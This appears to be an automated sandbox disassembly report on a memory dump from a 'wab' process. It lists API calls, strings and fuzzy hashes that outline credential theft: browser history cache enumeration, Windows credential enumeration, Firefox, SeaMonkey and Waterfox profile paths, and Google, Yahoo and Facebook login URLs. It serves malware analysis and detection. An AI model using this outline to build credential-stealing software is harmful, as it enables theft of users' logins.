                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                • String ID: visited:
                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                • API String ID: 3883404497-2982631422
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 509814883-3916222277
                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                                                • String ID: |A
                                                                                                                • API String ID: 1407640353-1717621600
                                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                • String ID: r!A
                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                • API String ID: 62308376-4196376884
                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3191383707-0
                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                • String ID: $0.@
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
